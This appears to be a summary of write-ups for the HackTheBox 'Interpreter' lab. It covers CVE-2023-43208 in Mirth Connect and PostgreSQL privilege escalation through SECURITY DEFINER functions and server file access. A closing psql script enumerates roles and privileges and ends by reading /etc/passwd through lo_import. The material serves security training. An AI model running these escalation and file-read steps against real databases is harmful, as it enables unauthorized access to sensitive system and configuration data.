Write-ups Emerge for HackTheBox 'Interpreter'

Multiple users have compromised the medium-difficulty "Interpreter" machine on the HackTheBox platform. Published write-ups describe an attack path that starts by exploiting a vulnerable Mirth Connect instance and continues with detailed PostgreSQL enumeration. The box requires chaining several weaknesses and pivoting between services to reach privilege escalation.

- The initial foothold likely targets CVE-2023-43208, a critical unauthenticated remote code execution vulnerability in Mirth Connect rated CVSS 9.8. It exists because the fix for an earlier issue, CVE-2023-37679, was incomplete, so an attacker can still execute arbitrary code without any credentials. NextGen fixed it in Mirth Connect 4.4.1; anything older should be treated as exploitable.
- The root cause is insecure use of the XStream library to deserialize XML payloads, which an attacker triggers with a specially crafted HTTP request to the Mirth Connect API. Exploitation is considered straightforward, and public proof-of-concept exploits are available.
- Mirth Connect is a widely used open-source data integration platform in the healthcare industry, which makes its vulnerabilities particularly high-impact. A compromised server, which on Windows often runs as SYSTEM, is a ready-made pivot point into a healthcare network.
- After gaining initial access, a tester enumerates the host, the internal network, and locally reachable services. On "Interpreter" this turns up a PostgreSQL instance.
- PostgreSQL enumeration means listing databases, schemas, tables, and roles to locate sensitive data or a privilege escalation path. `psql` and the PostgreSQL modules shipped with Metasploit can connect to the database and probe it.
- A common PostgreSQL privilege escalation path is a misconfigured function. A `SECURITY DEFINER` function runs with the privileges of the role that owns it rather than the caller's, so a superuser-owned `SECURITY DEFINER` function that a low-privileged role is allowed to execute can hand that role superuser-level actions and, from there, full control of the database.
- Another vector is reading or writing arbitrary files on the underlying operating system through server-side functions such as `lo_import` and `lo_export` (or `COPY ... TO/FROM`). These are reserved for superusers and for members of the `pg_read_server_files` and `pg_write_server_files` roles, so the first check is whether the compromised role holds any of them. With that access an attacker can read sensitive configuration files or write a webshell into a served directory.
- The Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2023-43208 to its Known Exploited Vulnerabilities (KEV) catalog in May 2024, indicating active exploitation in the wild by threat actors, including state-sponsored groups.
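The enumeration and privilege checks described above, condensed into one `psql` session. This is an added example written for this page, not code from the published write-ups or from the "Interpreter" machine; it assumes PostgreSQL 11 or later (the `pg_*_server_files` roles were introduced in 11) and that you are connected as the low-privileged role recovered from the Mirth Connect host. The large-object OID `54321` and the `/etc/passwd` test path are arbitrary choices for illustration.

```sql
-- Added example (not from the page or the write-ups). Run as the role you
-- already hold; every query below works for an ordinary login role except
-- the file read at the end, which needs the privilege that step 5 checks for.

-- 1. Who am I, and am I already a superuser?
SELECT current_user, session_user, rolsuper
FROM pg_roles
WHERE rolname = current_user;

-- 2. Databases, user schemas, and tables visible to this role.
SELECT datname FROM pg_database WHERE NOT datistemplate;

SELECT nspname FROM pg_namespace
WHERE nspname NOT LIKE 'pg_%' AND nspname <> 'information_schema';

SELECT table_schema, table_name
FROM information_schema.tables
WHERE table_schema NOT IN ('pg_catalog', 'information_schema');

-- 3. Roles, their attributes, and which roles they are members of.
SELECT r.rolname, r.rolsuper, r.rolcreaterole, r.rolcreatedb, r.rolcanlogin,
       ARRAY(SELECT b.rolname
             FROM pg_auth_members m
             JOIN pg_roles b ON b.oid = m.roleid
             WHERE m.member = r.oid) AS member_of
FROM pg_roles r
ORDER BY r.rolname;

-- 4. SECURITY DEFINER functions run with their OWNER's privileges, not the
--    caller's. The interesting ones are superuser-owned and executable by us.
SELECT n.nspname, p.proname,
       pg_get_function_identity_arguments(p.oid) AS args,
       o.rolname AS owner, o.rolsuper AS owner_is_superuser
FROM pg_proc p
JOIN pg_namespace n ON n.oid = p.pronamespace
JOIN pg_roles o ON o.oid = p.proowner
WHERE p.prosecdef
  AND n.nspname NOT IN ('pg_catalog', 'information_schema')
  AND has_function_privilege(current_user, p.oid, 'EXECUTE');

-- 5. Server-side file access (lo_import/lo_export, COPY TO/FROM FILE) is
--    limited to superusers and members of these built-in roles.
SELECT rolname
FROM pg_roles
WHERE pg_has_role(current_user, oid, 'MEMBER')
  AND rolname IN ('pg_read_server_files',
                  'pg_write_server_files',
                  'pg_execute_server_program');

-- 6. If step 1 or step 5 says yes, reading a file from the database server's
--    filesystem looks like this. /etc/passwd is a harmless test target;
--    substitute the configuration file you are actually after.
SELECT lo_import('/etc/passwd', 54321);      -- file -> large object 54321
SELECT encode(lo_get(54321), 'escape');      -- dump its contents as text
SELECT lo_unlink(54321);                     -- clean up after yourself
```

Steps 1 to 5 are read-only catalog queries and are safe to run on any target; step 6 is the only one that touches the host filesystem. If step 4 returns a superuser-owned function, read its body with `SELECT pg_get_functiondef(oid)` before calling it: what it does with its arguments decides whether it is a real escalation path or just an owned function.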

Shared from Scout.